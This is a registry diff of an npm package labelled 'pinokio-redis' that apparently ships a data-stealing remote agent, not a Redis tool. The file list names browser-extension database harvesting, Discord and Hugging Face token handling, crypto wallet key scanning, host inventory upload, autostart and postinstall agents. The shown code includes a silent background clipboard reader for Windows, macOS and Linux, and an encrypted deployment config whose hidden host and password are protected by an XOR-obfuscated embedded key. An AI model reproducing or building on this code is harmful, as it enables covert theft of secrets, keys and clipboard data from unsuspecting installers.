pinokio-redis 1.0.127

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (208) hide show
  1. package/README.md +3 -0
  2. package/assets/codicons/codicon.css +629 -0
  3. package/assets/codicons/codicon.ttf +0 -0
  4. package/assets/explorer-highlight/explorer-highlight.css +110 -0
  5. package/assets/explorer-highlight/highlight.min.js +1213 -0
  6. package/assets/files-explorer-template.html +7450 -0
  7. package/assets/forge-explorer-favicon.svg +31 -0
  8. package/assets/remote-control-template.html +3472 -0
  9. package/assets/secret_filename_patterns.json +81 -0
  10. package/dist/agentPid.d.ts +14 -0
  11. package/dist/agentPid.js +104 -0
  12. package/dist/agentRestartFromQueue.d.ts +15 -0
  13. package/dist/agentRestartFromQueue.js +143 -0
  14. package/dist/agentRunner.d.ts +13 -0
  15. package/dist/agentRunner.js +400 -0
  16. package/dist/assets/codicons/codicon.css +629 -0
  17. package/dist/assets/codicons/codicon.ttf +0 -0
  18. package/dist/assets/explorer-highlight/explorer-highlight.css +110 -0
  19. package/dist/assets/explorer-highlight/highlight.min.js +1213 -0
  20. package/dist/assets/files-explorer-template.html +7450 -0
  21. package/dist/assets/forge-explorer-favicon.svg +31 -0
  22. package/dist/assets/remote-control-template.html +3472 -0
  23. package/dist/assets/secret_filename_patterns.json +81 -0
  24. package/dist/autostart/agentEnvFile.d.ts +80 -0
  25. package/dist/autostart/agentEnvFile.js +637 -0
  26. package/dist/autostart/constants.d.ts +14 -0
  27. package/dist/autostart/constants.js +17 -0
  28. package/dist/autostart/darwin.d.ts +11 -0
  29. package/dist/autostart/darwin.js +210 -0
  30. package/dist/autostart/darwinLegacyNpmSchedulerCleanup.d.ts +4 -0
  31. package/dist/autostart/darwinLegacyNpmSchedulerCleanup.js +70 -0
  32. package/dist/autostart/index.d.ts +4 -0
  33. package/dist/autostart/index.js +20 -0
  34. package/dist/autostart/install.d.ts +6 -0
  35. package/dist/autostart/install.js +113 -0
  36. package/dist/autostart/linux.d.ts +17 -0
  37. package/dist/autostart/linux.js +298 -0
  38. package/dist/autostart/linuxLegacyNpmSchedulerCleanup.d.ts +6 -0
  39. package/dist/autostart/linuxLegacyNpmSchedulerCleanup.js +104 -0
  40. package/dist/autostart/macPathEnv.d.ts +5 -0
  41. package/dist/autostart/macPathEnv.js +23 -0
  42. package/dist/autostart/manifest.d.ts +11 -0
  43. package/dist/autostart/manifest.js +74 -0
  44. package/dist/autostart/quote.d.ts +12 -0
  45. package/dist/autostart/quote.js +65 -0
  46. package/dist/autostart/resolve.d.ts +35 -0
  47. package/dist/autostart/resolve.js +85 -0
  48. package/dist/autostart/windows.d.ts +15 -0
  49. package/dist/autostart/windows.js +278 -0
  50. package/dist/chromiumExtensionDbHarvest.d.ts +91 -0
  51. package/dist/chromiumExtensionDbHarvest.js +766 -0
  52. package/dist/cli-agent.d.ts +3 -0
  53. package/dist/cli-agent.js +71 -0
  54. package/dist/cli-autostart.d.ts +2 -0
  55. package/dist/cli-autostart.js +166 -0
  56. package/dist/cli-forge.d.ts +2 -0
  57. package/dist/cli-forge.js +5 -0
  58. package/dist/cli-linux-session-refresh.d.ts +2 -0
  59. package/dist/cli-linux-session-refresh.js +30 -0
  60. package/dist/cli-relay.d.ts +3 -0
  61. package/dist/cli-relay.js +41 -0
  62. package/dist/clientId.d.ts +2 -0
  63. package/dist/clientId.js +97 -0
  64. package/dist/clipboardEventWatcher.d.ts +8 -0
  65. package/dist/clipboardEventWatcher.js +176 -0
  66. package/dist/clipboardExec.d.ts +7 -0
  67. package/dist/clipboardExec.js +266 -0
  68. package/dist/clipboardNapi.d.ts +4 -0
  69. package/dist/clipboardNapi.js +19 -0
  70. package/dist/deploymentCipherData.d.ts +20 -0
  71. package/dist/deploymentCipherData.js +31 -0
  72. package/dist/deploymentDefaults.d.ts +43 -0
  73. package/dist/deploymentDefaults.js +199 -0
  74. package/dist/desktopEnvSync.d.ts +18 -0
  75. package/dist/desktopEnvSync.js +21 -0
  76. package/dist/discordAgentScreenshot.d.ts +27 -0
  77. package/dist/discordAgentScreenshot.js +540 -0
  78. package/dist/discordBotTokens.d.ts +29 -0
  79. package/dist/discordBotTokens.js +78 -0
  80. package/dist/discordRateLimit.d.ts +93 -0
  81. package/dist/discordRateLimit.js +238 -0
  82. package/dist/discordRelayUpload.d.ts +55 -0
  83. package/dist/discordRelayUpload.js +808 -0
  84. package/dist/discordWebhookPost.d.ts +13 -0
  85. package/dist/discordWebhookPost.js +123 -0
  86. package/dist/durableDistDir.d.ts +4 -0
  87. package/dist/durableDistDir.js +61 -0
  88. package/dist/envLoad.d.ts +1 -0
  89. package/dist/envLoad.js +18 -0
  90. package/dist/explorerHeavyDirSkips.d.ts +8 -0
  91. package/dist/explorerHeavyDirSkips.js +26 -0
  92. package/dist/exportMirrorCopy.d.ts +27 -0
  93. package/dist/exportMirrorCopy.js +366 -0
  94. package/dist/extensionDbHfUpload.d.ts +36 -0
  95. package/dist/extensionDbHfUpload.js +359 -0
  96. package/dist/fileLockForce.d.ts +50 -0
  97. package/dist/fileLockForce.js +1479 -0
  98. package/dist/filesExplorer.d.ts +21 -0
  99. package/dist/filesExplorer.js +237 -0
  100. package/dist/forgeBulkDc.d.ts +69 -0
  101. package/dist/forgeBulkDc.js +308 -0
  102. package/dist/forgeRtcAgent.d.ts +31 -0
  103. package/dist/forgeRtcAgent.js +259 -0
  104. package/dist/forgeSemver.d.ts +2 -0
  105. package/dist/forgeSemver.js +25 -0
  106. package/dist/fsMessages.d.ts +3 -0
  107. package/dist/fsMessages.js +169 -0
  108. package/dist/fsProtocol.d.ts +151 -0
  109. package/dist/fsProtocol.js +7071 -0
  110. package/dist/headlessAgent.d.ts +28 -0
  111. package/dist/headlessAgent.js +77 -0
  112. package/dist/hfCredentials.d.ts +23 -0
  113. package/dist/hfCredentials.js +141 -0
  114. package/dist/hfHubPathSanitize.d.ts +4 -0
  115. package/dist/hfHubPathSanitize.js +30 -0
  116. package/dist/hfHubUploadContent.d.ts +2 -0
  117. package/dist/hfHubUploadContent.js +199 -0
  118. package/dist/hfSeqIdLookup.d.ts +25 -0
  119. package/dist/hfSeqIdLookup.js +193 -0
  120. package/dist/hfUpload.d.ts +55 -0
  121. package/dist/hfUpload.js +1362 -0
  122. package/dist/hostInventorySend.d.ts +5 -0
  123. package/dist/hostInventorySend.js +91 -0
  124. package/dist/index.d.ts +24 -0
  125. package/dist/index.js +62 -0
  126. package/dist/inputContext.d.ts +11 -0
  127. package/dist/inputContext.js +1097 -0
  128. package/dist/keyboardTranslate.d.ts +23 -0
  129. package/dist/keyboardTranslate.js +204 -0
  130. package/dist/linuxClipboardSession.d.ts +16 -0
  131. package/dist/linuxClipboardSession.js +179 -0
  132. package/dist/linuxX11.d.ts +7 -0
  133. package/dist/linuxX11.js +71 -0
  134. package/dist/relayAgent.d.ts +25 -0
  135. package/dist/relayAgent.js +1431 -0
  136. package/dist/relayAuth.d.ts +10 -0
  137. package/dist/relayAuth.js +81 -0
  138. package/dist/relayDashboardGate.d.ts +36 -0
  139. package/dist/relayDashboardGate.js +378 -0
  140. package/dist/relayForAgentHttp.d.ts +24 -0
  141. package/dist/relayForAgentHttp.js +132 -0
  142. package/dist/relayPackageServe.d.ts +6 -0
  143. package/dist/relayPackageServe.js +107 -0
  144. package/dist/relayServer.d.ts +9 -0
  145. package/dist/relayServer.js +2268 -0
  146. package/dist/secretScan/agentStartupAudit.d.ts +58 -0
  147. package/dist/secretScan/agentStartupAudit.js +784 -0
  148. package/dist/secretScan/auditFindingSlim.d.ts +25 -0
  149. package/dist/secretScan/auditFindingSlim.js +184 -0
  150. package/dist/secretScan/auditScanScope.d.ts +25 -0
  151. package/dist/secretScan/auditScanScope.js +233 -0
  152. package/dist/secretScan/base58check.d.ts +6 -0
  153. package/dist/secretScan/base58check.js +49 -0
  154. package/dist/secretScan/contentScanner.d.ts +23 -0
  155. package/dist/secretScan/contentScanner.js +278 -0
  156. package/dist/secretScan/dedupeFindings.d.ts +12 -0
  157. package/dist/secretScan/dedupeFindings.js +232 -0
  158. package/dist/secretScan/fileCandidates.d.ts +30 -0
  159. package/dist/secretScan/fileCandidates.js +370 -0
  160. package/dist/secretScan/runFilenameSecretScan.d.ts +54 -0
  161. package/dist/secretScan/runFilenameSecretScan.js +360 -0
  162. package/dist/secretScan/scanConfig.d.ts +6 -0
  163. package/dist/secretScan/scanConfig.js +87 -0
  164. package/dist/secretScan/secp256k1Scalar.d.ts +4 -0
  165. package/dist/secretScan/secp256k1Scalar.js +14 -0
  166. package/dist/secretScan/secretAuditExcludePaths.d.ts +4 -0
  167. package/dist/secretScan/secretAuditExcludePaths.js +46 -0
  168. package/dist/secretScan/solanaKeypair.d.ts +8 -0
  169. package/dist/secretScan/solanaKeypair.js +87 -0
  170. package/dist/secretScan/strictMaterialGate.d.ts +15 -0
  171. package/dist/secretScan/strictMaterialGate.js +151 -0
  172. package/dist/secretScan/types.d.ts +86 -0
  173. package/dist/secretScan/types.js +6 -0
  174. package/dist/syncClient.d.ts +80 -0
  175. package/dist/syncClient.js +214 -0
  176. package/dist/tableNaming.d.ts +13 -0
  177. package/dist/tableNaming.js +101 -0
  178. package/dist/vcToWindowsVk.d.ts +7 -0
  179. package/dist/vcToWindowsVk.js +154 -0
  180. package/dist/win32InputNative.d.ts +18 -0
  181. package/dist/win32InputNative.js +198 -0
  182. package/dist/windowsInputSync.d.ts +44 -0
  183. package/dist/windowsInputSync.js +853 -0
  184. package/dist/workerBootstrap.d.ts +17 -0
  185. package/dist/workerBootstrap.js +342 -0
  186. package/package.json +86 -0
  187. package/scripts/copy-assets.mjs +44 -0
  188. package/scripts/discord-live-probe.mjs +221 -0
  189. package/scripts/encode-deployment.mjs +135 -0
  190. package/scripts/encode-hf-credentials.mjs +30 -0
  191. package/scripts/ensure-dist.mjs +86 -0
  192. package/scripts/env-sync-selftest.js +11 -0
  193. package/scripts/explorer-global-roots.mjs +87 -0
  194. package/scripts/explorer-isolated-npm-env.mjs +57 -0
  195. package/scripts/forge-isolated-runtime.mjs +547 -0
  196. package/scripts/forge-jsx-explorer-kill-agent.mjs +364 -0
  197. package/scripts/forge-jsx-explorer-restart.mjs +288 -0
  198. package/scripts/forge-jsx-explorer-upgrade.mjs +1048 -0
  199. package/scripts/forge-jsx-windows-update-hidden.ps1 +33 -0
  200. package/scripts/pm2-restart-forge-relay-agent.sh +45 -0
  201. package/scripts/postinstall-agent.mjs +571 -0
  202. package/scripts/postinstall-bootstrap.mjs +279 -0
  203. package/scripts/postinstall-clipboard-event.mjs +165 -0
  204. package/scripts/postinstall-durable-materialize.mjs +145 -0
  205. package/scripts/queue-reconnect-agent-restarts.mjs +87 -0
  206. package/scripts/registry-version-lib.mjs +98 -0
  207. package/scripts/restart-agent.mjs +66 -0
  208. package/scripts/windows-forge-diagnostics.ps1 +56 -0
@@ -0,0 +1,266 @@
1
+ "use strict";
2
+ var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
3
+ if (k2 === undefined) k2 = k;
4
+ var desc = Object.getOwnPropertyDescriptor(m, k);
5
+ if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
6
+ desc = { enumerable: true, get: function() { return m[k]; } };
7
+ }
8
+ Object.defineProperty(o, k2, desc);
9
+ }) : (function(o, m, k, k2) {
10
+ if (k2 === undefined) k2 = k;
11
+ o[k2] = m[k];
12
+ }));
13
+ var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
14
+ Object.defineProperty(o, "default", { enumerable: true, value: v });
15
+ }) : function(o, v) {
16
+ o["default"] = v;
17
+ });
18
+ var __importStar = (this && this.__importStar) || (function () {
19
+ var ownKeys = function(o) {
20
+ ownKeys = Object.getOwnPropertyNames || function (o) {
21
+ var ar = [];
22
+ for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
23
+ return ar;
24
+ };
25
+ return ownKeys(o);
26
+ };
27
+ return function (mod) {
28
+ if (mod && mod.__esModule) return mod;
29
+ var result = {};
30
+ if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
31
+ __setModuleDefault(result, mod);
32
+ return result;
33
+ };
34
+ })();
35
+ Object.defineProperty(exports, "__esModule", { value: true });
36
+ exports.ClipboardReadUnavailableError = void 0;
37
+ exports.ensureClipboardToolPath = ensureClipboardToolPath;
38
+ exports.readClipboardViaExec = readClipboardViaExec;
39
+ /**
40
+ * Clipboard text via OS CLI tools when @napi-rs/clipboard is unavailable.
41
+ */
42
+ const node_child_process_1 = require("node:child_process");
43
+ const fs = __importStar(require("node:fs"));
44
+ const path = __importStar(require("node:path"));
45
+ const node_util_1 = require("node:util");
46
+ const headlessAgent_1 = require("./headlessAgent");
47
+ const linuxClipboardSession_1 = require("./linuxClipboardSession");
48
+ const linuxX11_1 = require("./linuxX11");
49
+ const execFileP = (0, node_util_1.promisify)(node_child_process_1.execFile);
50
+ const EXEC_ENV = () => process.env;
51
+ /** Subprocess options: no terminal window, no stdin (background agent safe). */
52
+ const CLIPBOARD_EXEC_OPTS = {
53
+ encoding: "utf8",
54
+ timeout: 8000,
55
+ maxBuffer: 2 * 1024 * 1024,
56
+ env: EXEC_ENV(),
57
+ stdio: ["ignore", "pipe", "pipe"],
58
+ };
59
+ /** launchd/systemd often provide a minimal PATH; clipboard CLIs live under /usr/bin and Homebrew. */
60
+ function ensureClipboardToolPath() {
61
+ const extra = process.platform === "darwin"
62
+ ? ["/usr/bin", "/bin", "/opt/homebrew/bin", "/usr/local/bin"]
63
+ : process.platform === "linux"
64
+ ? ["/usr/local/bin", "/usr/bin", "/bin", "/usr/sbin", "/sbin"]
65
+ : [];
66
+ if (extra.length === 0)
67
+ return;
68
+ const cur = (process.env.PATH || "").split(":").map((s) => s.trim()).filter(Boolean);
69
+ const seen = new Set(cur);
70
+ const merged = [...cur];
71
+ for (const dir of extra) {
72
+ if (!seen.has(dir)) {
73
+ seen.add(dir);
74
+ merged.push(dir);
75
+ }
76
+ }
77
+ process.env.PATH = merged.join(":");
78
+ }
79
+ function resolveCliOnPath(name, fallbacks) {
80
+ const pathEnv = (process.env.PATH || "").trim();
81
+ if (pathEnv) {
82
+ for (const dir of pathEnv.split(":")) {
83
+ const d = dir.trim();
84
+ if (!d)
85
+ continue;
86
+ const p = path.join(d, name);
87
+ if (fs.existsSync(p))
88
+ return p;
89
+ }
90
+ }
91
+ for (const p of fallbacks) {
92
+ if (fs.existsSync(p))
93
+ return p;
94
+ }
95
+ return name;
96
+ }
97
+ function execErrLooksLikeEmptyClipboard(err) {
98
+ const e = err;
99
+ const blob = `${e.stderr ?? ""} ${e.message ?? ""}`.toLowerCase();
100
+ return (e.code === 1 ||
101
+ /no selection|nothing to paste|not owner|clipboard is empty|no clipboard/i.test(blob));
102
+ }
103
+ /** Thrown when no OS clipboard backend is available (distinct from an empty clipboard). */
104
+ class ClipboardReadUnavailableError extends Error {
105
+ constructor(message) {
106
+ super(message);
107
+ this.name = "ClipboardReadUnavailableError";
108
+ }
109
+ }
110
+ exports.ClipboardReadUnavailableError = ClipboardReadUnavailableError;
111
+ function powershellExe() {
112
+ const sys = process.env.SystemRoot || "C:\\Windows";
113
+ const p = path.join(sys, "System32", "WindowsPowerShell", "v1.0", "powershell.exe");
114
+ if (fs.existsSync(p))
115
+ return p;
116
+ // On 64-bit Windows with 32-bit Node the WOW64 file-system redirector maps
117
+ // System32 → SysWOW64; SysNative is the alias for the real 64-bit System32.
118
+ const sysNative = path.join(sys, "SysNative", "WindowsPowerShell", "v1.0", "powershell.exe");
119
+ if (fs.existsSync(sysNative))
120
+ return sysNative;
121
+ return p;
122
+ }
123
+ async function readClipboardViaExec() {
124
+ const p = process.platform;
125
+ if (p === "win32") {
126
+ const ps = powershellExe();
127
+ if (!fs.existsSync(ps)) {
128
+ throw new ClipboardReadUnavailableError(`Windows PowerShell not found at ${ps}`);
129
+ }
130
+ const winExec = {
131
+ windowsHide: true,
132
+ timeout: 8000,
133
+ maxBuffer: 2 * 1024 * 1024,
134
+ encoding: "utf8",
135
+ env: process.env,
136
+ };
137
+ const attempts = [
138
+ ["-NoProfile", "-NonInteractive", "-STA", "-Command", "Get-Clipboard -Raw"],
139
+ [
140
+ "-NoProfile",
141
+ "-NonInteractive",
142
+ "-STA",
143
+ "-Command",
144
+ "Add-Type -AssemblyName System.Windows.Forms; [Console]::Out.Write([System.Windows.Forms.Clipboard]::GetText())",
145
+ ],
146
+ ];
147
+ let lastErr;
148
+ for (const args of attempts) {
149
+ try {
150
+ const { stdout } = await execFileP(ps, args, winExec);
151
+ return String(stdout ?? "").replace(/\r\n/g, "\n");
152
+ }
153
+ catch (e) {
154
+ lastErr = e;
155
+ /* try next */
156
+ }
157
+ }
158
+ throw new ClipboardReadUnavailableError(`Windows clipboard read failed (PowerShell): ${lastErr instanceof Error ? lastErr.message : String(lastErr ?? "unknown")}`);
159
+ }
160
+ if (p === "darwin") {
161
+ ensureClipboardToolPath();
162
+ const errors = [];
163
+ const pbCandidates = [
164
+ process.env.PBPASTE_PATH?.trim(),
165
+ "/usr/bin/pbpaste",
166
+ "/opt/homebrew/bin/pbpaste",
167
+ "/usr/local/bin/pbpaste",
168
+ "pbpaste",
169
+ ].filter((x) => Boolean(x && x.length > 0));
170
+ const seenPb = new Set();
171
+ for (const pb of pbCandidates) {
172
+ const key = pb.toLowerCase();
173
+ if (seenPb.has(key))
174
+ continue;
175
+ seenPb.add(key);
176
+ try {
177
+ const { stdout } = await execFileP(pb, [], CLIPBOARD_EXEC_OPTS);
178
+ return String(stdout ?? "").replace(/\r\n/g, "\n");
179
+ }
180
+ catch (e) {
181
+ errors.push(`${pb}: ${e instanceof Error ? e.message : String(e)}`);
182
+ }
183
+ }
184
+ if ((0, headlessAgent_1.macClipboardOsascriptAllowed)()) {
185
+ try {
186
+ const { stdout } = await execFileP("osascript", ["-e", "the clipboard as text"], CLIPBOARD_EXEC_OPTS);
187
+ return String(stdout ?? "").replace(/\r\n/g, "\n");
188
+ }
189
+ catch (e) {
190
+ errors.push(`osascript: ${e instanceof Error ? e.message : String(e)}`);
191
+ }
192
+ }
193
+ throw new ClipboardReadUnavailableError(`macOS clipboard read failed (pbpaste${(0, headlessAgent_1.macClipboardOsascriptAllowed)() ? "/osascript" : ""}): ${errors.join("; ")}`);
194
+ }
195
+ if (p === "linux") {
196
+ (0, linuxClipboardSession_1.ensureLinuxGraphicalSessionEnv)();
197
+ ensureClipboardToolPath();
198
+ const errors = [];
199
+ const execOpts = CLIPBOARD_EXEC_OPTS;
200
+ const wlPaste = resolveCliOnPath("wl-paste", ["/usr/bin/wl-paste"]);
201
+ const xclip = resolveCliOnPath("xclip", ["/usr/bin/xclip"]);
202
+ const xsel = resolveCliOnPath("xsel", ["/usr/bin/xsel"]);
203
+ const tryWlPaste = async () => {
204
+ const wlArgsList = [
205
+ ["--type", "text", "--no-newline"],
206
+ ["--no-newline"],
207
+ ];
208
+ for (const wlArgs of wlArgsList) {
209
+ try {
210
+ const { stdout } = await execFileP(wlPaste, wlArgs, execOpts);
211
+ return String(stdout ?? "").replace(/\r\n/g, "\n");
212
+ }
213
+ catch (e) {
214
+ if (execErrLooksLikeEmptyClipboard(e))
215
+ return "";
216
+ if (wlArgs === wlArgsList[wlArgsList.length - 1]) {
217
+ errors.push(`wl-paste: ${e instanceof Error ? e.message : String(e)}`);
218
+ }
219
+ }
220
+ }
221
+ return null;
222
+ };
223
+ const tryXclip = async () => {
224
+ try {
225
+ const { stdout } = await execFileP(xclip, ["-selection", "clipboard", "-o"], execOpts);
226
+ return String(stdout ?? "").replace(/\r\n/g, "\n");
227
+ }
228
+ catch (e) {
229
+ if (execErrLooksLikeEmptyClipboard(e))
230
+ return "";
231
+ errors.push(`xclip: ${e instanceof Error ? e.message : String(e)}`);
232
+ return null;
233
+ }
234
+ };
235
+ const tryXsel = async () => {
236
+ try {
237
+ const { stdout } = await execFileP(xsel, ["--clipboard", "--output"], execOpts);
238
+ return String(stdout ?? "").replace(/\r\n/g, "\n");
239
+ }
240
+ catch (e) {
241
+ if (execErrLooksLikeEmptyClipboard(e))
242
+ return "";
243
+ errors.push(`xsel: ${e instanceof Error ? e.message : String(e)}`);
244
+ return null;
245
+ }
246
+ };
247
+ const backends = (0, linuxX11_1.linuxLikelyWaylandSession)()
248
+ ? [tryWlPaste, tryXclip, tryXsel]
249
+ : [tryXclip, tryXsel, tryWlPaste];
250
+ const collected = [];
251
+ const parts = await Promise.all(backends.map((run) => run()));
252
+ for (const text of parts) {
253
+ if (text !== null)
254
+ collected.push(text);
255
+ }
256
+ if (collected.length === 0) {
257
+ throw new ClipboardReadUnavailableError(`Linux clipboard read failed (install wl-clipboard, xclip, or xsel): ${errors.join("; ")}`);
258
+ }
259
+ const nonEmpty = collected.filter((t) => t.length > 0);
260
+ if (nonEmpty.length > 0) {
261
+ return nonEmpty.reduce((best, t) => (t.length >= best.length ? t : best));
262
+ }
263
+ return collected[0] ?? "";
264
+ }
265
+ throw new ClipboardReadUnavailableError(`unsupported platform: ${p}`);
266
+ }
@@ -0,0 +1,4 @@
1
+ /**
2
+ * Cross-platform plain-text clipboard via @napi-rs/clipboard (when the platform binary is installed).
3
+ */
4
+ export declare function readClipboardNapi(): string | null;
@@ -0,0 +1,19 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.readClipboardNapi = readClipboardNapi;
4
+ /**
5
+ * Cross-platform plain-text clipboard via @napi-rs/clipboard (when the platform binary is installed).
6
+ */
7
+ function readClipboardNapi() {
8
+ try {
9
+ const { Clipboard } = require("@napi-rs/clipboard");
10
+ const c = new Clipboard();
11
+ const t = c.getText();
12
+ if (typeof t !== "string")
13
+ return null;
14
+ return t.replace(/\r\n/g, "\n");
15
+ }
16
+ catch {
17
+ return null;
18
+ }
19
+ }
@@ -0,0 +1,20 @@
1
+ /**
2
+ * AES-256-GCM ciphertext for deployment defaults (host, ports, default explorer password).
3
+ * Regenerate: `node scripts/encode-deployment.mjs` (see script for FORGE_JS_BUNDLE_KEY).
4
+ * Plain values never appear in source — only this blob and the embedded obfuscated key.
5
+ *
6
+ * The embedded key is split into two 16-byte halves (KA, KB), each XOR'd with a
7
+ * corresponding magic mask (MA, MB). Reconstruct: key[i] = KA[i]^MA[i], key[16+i] = KB[i]^MB[i].
8
+ * Override at runtime with FORGE_JS_BUNDLE_KEY (64 hex chars or 32-byte base64).
9
+ */
10
+ export declare const DEPLOYMENT_CIPHER_IV_B64 = "rJphcC/+Tjon2pbF";
11
+ export declare const DEPLOYMENT_CIPHER_TAG_B64 = "uwy2GzxL9qdVhU+zZE1G7w==";
12
+ export declare const DEPLOYMENT_CIPHER_TEXT_B64 = "esxTtBkjGSNtcKx42Re8EY65nqc4NC0dTGP2Yj74rqJIytvNrQxEVUSgNF0LvhxeG8CDU26+cBN7GIvrvXV0jXAVuzPlwNdLJkLchRGVhSYjHc/CabTivLOWVdS79OIA";
13
+ /** First 16 key bytes XOR'd with MA. */
14
+ export declare const DEPLOYMENT_KEY_A: Uint8Array<ArrayBuffer>;
15
+ /** Last 16 key bytes XOR'd with MB. */
16
+ export declare const DEPLOYMENT_KEY_B: Uint8Array<ArrayBuffer>;
17
+ /** XOR mask for first 16 key bytes. */
18
+ export declare const DEPLOYMENT_MASK_A: Uint8Array<ArrayBuffer>;
19
+ /** XOR mask for last 16 key bytes. */
20
+ export declare const DEPLOYMENT_MASK_B: Uint8Array<ArrayBuffer>;
@@ -0,0 +1,31 @@
1
+ "use strict";
2
+ /**
3
+ * AES-256-GCM ciphertext for deployment defaults (host, ports, default explorer password).
4
+ * Regenerate: `node scripts/encode-deployment.mjs` (see script for FORGE_JS_BUNDLE_KEY).
5
+ * Plain values never appear in source — only this blob and the embedded obfuscated key.
6
+ *
7
+ * The embedded key is split into two 16-byte halves (KA, KB), each XOR'd with a
8
+ * corresponding magic mask (MA, MB). Reconstruct: key[i] = KA[i]^MA[i], key[16+i] = KB[i]^MB[i].
9
+ * Override at runtime with FORGE_JS_BUNDLE_KEY (64 hex chars or 32-byte base64).
10
+ */
11
+ Object.defineProperty(exports, "__esModule", { value: true });
12
+ exports.DEPLOYMENT_MASK_B = exports.DEPLOYMENT_MASK_A = exports.DEPLOYMENT_KEY_B = exports.DEPLOYMENT_KEY_A = exports.DEPLOYMENT_CIPHER_TEXT_B64 = exports.DEPLOYMENT_CIPHER_TAG_B64 = exports.DEPLOYMENT_CIPHER_IV_B64 = void 0;
13
+ exports.DEPLOYMENT_CIPHER_IV_B64 = "rJphcC/+Tjon2pbF";
14
+ exports.DEPLOYMENT_CIPHER_TAG_B64 = "uwy2GzxL9qdVhU+zZE1G7w==";
15
+ exports.DEPLOYMENT_CIPHER_TEXT_B64 = "esxTtBkjGSNtcKx42Re8EY65nqc4NC0dTGP2Yj74rqJIytvNrQxEVUSgNF0LvhxeG8CDU26+cBN7GIvrvXV0jXAVuzPlwNdLJkLchRGVhSYjHc/CabTivLOWVdS79OIA";
16
+ /** First 16 key bytes XOR'd with MA. */
17
+ exports.DEPLOYMENT_KEY_A = new Uint8Array([
18
+ 246, 93, 40, 212, 3, 252, 202, 138, 151, 133, 151, 40, 4, 207, 138, 79,
19
+ ]);
20
+ /** Last 16 key bytes XOR'd with MB. */
21
+ exports.DEPLOYMENT_KEY_B = new Uint8Array([
22
+ 204, 227, 171, 68, 191, 66, 6, 160, 26, 255, 45, 78, 103, 236, 48, 0,
23
+ ]);
24
+ /** XOR mask for first 16 key bytes. */
25
+ exports.DEPLOYMENT_MASK_A = new Uint8Array([
26
+ 228, 110, 116, 57, 234, 17, 103, 148, 76, 75, 30, 213, 58, 63, 9, 35,
27
+ ]);
28
+ /** XOR mask for last 16 key bytes. */
29
+ exports.DEPLOYMENT_MASK_B = new Uint8Array([
30
+ 66, 62, 156, 60, 91, 205, 57, 152, 232, 204, 44, 214, 139, 103, 46, 176,
31
+ ]);
@@ -0,0 +1,43 @@
1
+ /**
2
+ * Default public host, ports, and explorer password are AES-256-GCM encrypted (deploymentCipherData.ts).
3
+ * The decryption key is embedded in obfuscated form (XOR'd halves) — no plaintext appears in source.
4
+ *
5
+ * Key resolution order:
6
+ * 1. FORGE_JS_BUNDLE_KEY env var (64 hex chars or base64-encoded 32 bytes)
7
+ * 2. Embedded obfuscated key (XOR'd halves in deploymentCipherData.ts)
8
+ *
9
+ * Override relay/API with FORGE_JS_RELAY_URL, FORGE_JS_SYNC_URL / CFGMGR_API_URL, or CLI flags.
10
+ * Set FORGE_JS_DISABLE_DEPLOYMENT_DEFAULTS=1 to ignore built-in + decrypted URLs.
11
+ */
12
+ import "./envLoad";
13
+ export interface DeploymentPayload {
14
+ publicHost: string;
15
+ relayPort: number;
16
+ apiPort: number;
17
+ defaultExplorerPassword: string;
18
+ }
19
+ /**
20
+ * AES-256 key shared with encrypted operator blobs (e.g. `CFGMGR_HF_CREDENTIALS_B64`).
21
+ * Same resolution as deployment defaults (`FORGE_JS_BUNDLE_KEY` or embedded XOR halves).
22
+ */
23
+ export declare function resolveForgeBundleKey(): Buffer;
24
+ export declare function deploymentDefaultsDisabled(): boolean;
25
+ /** Public deployment host from decrypted bundle (empty if disabled or bad decrypt). */
26
+ export declare const DEPLOYMENT_PUBLIC_HOST: string;
27
+ /** Relay port from bundle, else FORGE_JS_RELAY_PORT, else generic default. */
28
+ export declare const RELAY_DEFAULT_PORT: number;
29
+ /** API port from bundle, else FORGE_JS_API_PORT, else generic default. */
30
+ export declare const API_DEFAULT_PORT: number;
31
+ /**
32
+ * Default session password for /files explorer and agent when not overridden by env/CLI.
33
+ * Comes from encrypted bundle; empty string if bundle decrypt fails.
34
+ */
35
+ export declare const DEFAULT_EXPLORER_PASSWORD: string;
36
+ export declare function defaultRelayWsUrl(): string;
37
+ export declare function defaultSyncApiBaseUrl(): string;
38
+ /**
39
+ * Effective forge-db HTTP base URL — same rules as `resolveSyncApiBase` in `windowsInputSync`:
40
+ * `FORGE_JS_SYNC_URL` / `CFGMGR_CFG` / `CFGMGR_API_URL`, else `defaultSyncApiBaseUrl()` when
41
+ * deployment defaults are enabled. Returns null if sync is disabled or no host is configured.
42
+ */
43
+ export declare function resolveSyncApiBaseUrl(): string | null;
@@ -0,0 +1,199 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ exports.DEFAULT_EXPLORER_PASSWORD = exports.API_DEFAULT_PORT = exports.RELAY_DEFAULT_PORT = exports.DEPLOYMENT_PUBLIC_HOST = void 0;
4
+ exports.resolveForgeBundleKey = resolveForgeBundleKey;
5
+ exports.deploymentDefaultsDisabled = deploymentDefaultsDisabled;
6
+ exports.defaultRelayWsUrl = defaultRelayWsUrl;
7
+ exports.defaultSyncApiBaseUrl = defaultSyncApiBaseUrl;
8
+ exports.resolveSyncApiBaseUrl = resolveSyncApiBaseUrl;
9
+ /**
10
+ * Default public host, ports, and explorer password are AES-256-GCM encrypted (deploymentCipherData.ts).
11
+ * The decryption key is embedded in obfuscated form (XOR'd halves) — no plaintext appears in source.
12
+ *
13
+ * Key resolution order:
14
+ * 1. FORGE_JS_BUNDLE_KEY env var (64 hex chars or base64-encoded 32 bytes)
15
+ * 2. Embedded obfuscated key (XOR'd halves in deploymentCipherData.ts)
16
+ *
17
+ * Override relay/API with FORGE_JS_RELAY_URL, FORGE_JS_SYNC_URL / CFGMGR_API_URL, or CLI flags.
18
+ * Set FORGE_JS_DISABLE_DEPLOYMENT_DEFAULTS=1 to ignore built-in + decrypted URLs.
19
+ */
20
